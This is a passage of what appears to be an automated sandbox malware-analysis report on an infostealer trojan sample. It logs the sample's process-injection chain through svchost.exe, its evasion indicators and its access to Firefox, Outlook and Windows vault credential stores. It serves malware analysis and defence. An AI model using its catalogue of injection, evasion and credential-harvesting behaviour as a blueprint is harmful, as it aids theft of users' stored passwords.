                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0060AD546_2_0060AD54
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006151E06_2_006151E0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006133CB6_2_006133CB
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_006133D06_2_006133D0
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_0062B9806_2_0062B980
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9E2186_2_02C9E218
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9E3336_2_02C9E333
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9E6CE6_2_02C9E6CE
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: 6_2_02C9D7986_2_02C9D798
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F27E54 appears 102 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F4EA12 appears 86 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F15130 appears 58 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02ECB970 appears 280 times
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeCode function: String function: 02F5F290 appears 105 times
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: String function: 00437DE1 appears 36 times
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: String function: 00450AE3 appears 70 times
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: String function: 00458900 appears 42 times
                Source: BLv4mI7zzY.exe, 00000000.00000003.2129978395.0000000003DA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BLv4mI7zzY.exe
                Source: BLv4mI7zzY.exe, 00000000.00000003.2128032029.0000000003F4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BLv4mI7zzY.exe
                Source: BLv4mI7zzY.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/3
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049A06A GetLastError,FormatMessageW,0_2_0049A06A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004881CB AdjustTokenPrivileges,CloseHandle,0_2_004881CB
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004887E1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0049B333
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004AEE0D
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0049C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0049C397
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00434E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00434E89
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeFile created: C:\Users\user\AppData\Local\Temp\autFE60.tmpJump to behavior
                Source: BLv4mI7zzY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RMActivate_ssp_isv.exe, 00000006.00000003.2814173192.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2814065216.000000000078F000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.00000000007E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BLv4mI7zzY.exeVirustotal: Detection: 56%
                Source: BLv4mI7zzY.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\BLv4mI7zzY.exe "C:\Users\user\Desktop\BLv4mI7zzY.exe"
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BLv4mI7zzY.exe"
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe "C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Section loaded: ntmarta.dll
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: BLv4mI7zzY.exe | Static file information: File size 1198080 > 1048576
                Source: BLv4mI7zzY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: BLv4mI7zzY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: BLv4mI7zzY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: BLv4mI7zzY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: BLv4mI7zzY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: BLv4mI7zzY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: BLv4mI7zzY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541536503.000000000036E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdb source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdbGCTL source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
                Source: BLv4mI7zzY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: BLv4mI7zzY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: BLv4mI7zzY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: BLv4mI7zzY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: BLv4mI7zzY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_00434B37 LoadLibraryA,GetProcAddress, | 0_2_00434B37
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0043C4C6 push A30043BAh; retn 0043h | 0_2_0043C50D
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_00458945 push ecx; ret | 0_2_00458958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041701F push ecx; iretd | 2_2_00417020
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004118C3 push esi; iretd | 2_2_004118CE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004118BB push esi; iretd | 2_2_004118CE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411934 push ecx; iretd | 2_2_00411951
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A9D7 push esi; retf | 2_2_0040A9EE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403260 push eax; ret | 2_2_00403262
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418ABD push edi; iretd | 2_2_00418ACF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A4DC pushfd ; iretd | 2_2_0041A4E2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx | 2_2_037309B6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F4210 push eax; retf | 5_2_027F4212
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027E8B94 push cs; iretd | 5_2_027E8B95
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F0099 push esi; iretd | 5_2_027F00A4
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F0091 push esi; iretd | 5_2_027F00A4
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F010A push ecx; iretd | 5_2_027F0127
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027E91AD push esi; retf | 5_2_027E91C4
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F66CA push FFFFFFFEh; retf | 5_2_027F66CC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F57F5 push ecx; iretd | 5_2_027F57F6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F3CCD push ecx; iretd | 5_2_027F3DB6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F3D68 push ecx; iretd | 5_2_027F3DB6
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe | Code function: 5_2_027F3DB7 push ecx; iretd | 5_2_027F3DB6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_02ED09AD push ecx; mov dword ptr [esp], ecx | 6_2_02ED09B6
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_00612294 push ecx; iretd | 6_2_0061237D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_0061237E push ecx; iretd | 6_2_0061237D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_0061232F push ecx; iretd | 6_2_0061237D
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_0060E660 push esi; iretd | 6_2_0060E66B
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_0060E658 push esi; iretd | 6_2_0060E66B
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_0060E6D1 push ecx; iretd | 6_2_0060E6EE
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_00617279 pushfd ; iretd | 6_2_0061727F
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Code function: 6_2_00607774 push esi; retf | 6_2_0060778B
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_004348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_004348D7
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_004B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_004B5376
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_00453187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00453187
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | API/Special instruction interceptor: Address: 1F93224
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E rdtsc | 2_2_0377096E
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Window / User API: threadDelayed 2277
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Window / User API: threadDelayed 7697
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-101913
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | API coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | API coverage: 2.7 %
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe TID: 948 | Thread sleep time: -35000s >= -30000s
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820 | Thread sleep count: 2277 > 30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820 | Thread sleep time: -4554000s >= -30000s
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820 | Thread sleep count: 7697 > 30
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe TID: 3820 | Thread sleep time: -15394000s >= -30000s
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0049445A GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_0049445A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0049C6D1 FindFirstFileW,FindClose, | 0_2_0049C6D1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0049C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_0049C75C
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0049EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0049EF95
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0049F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_0049F0F2
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_0049F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_0049F3F3
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe | Code function: 0_2_004937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_004937EF
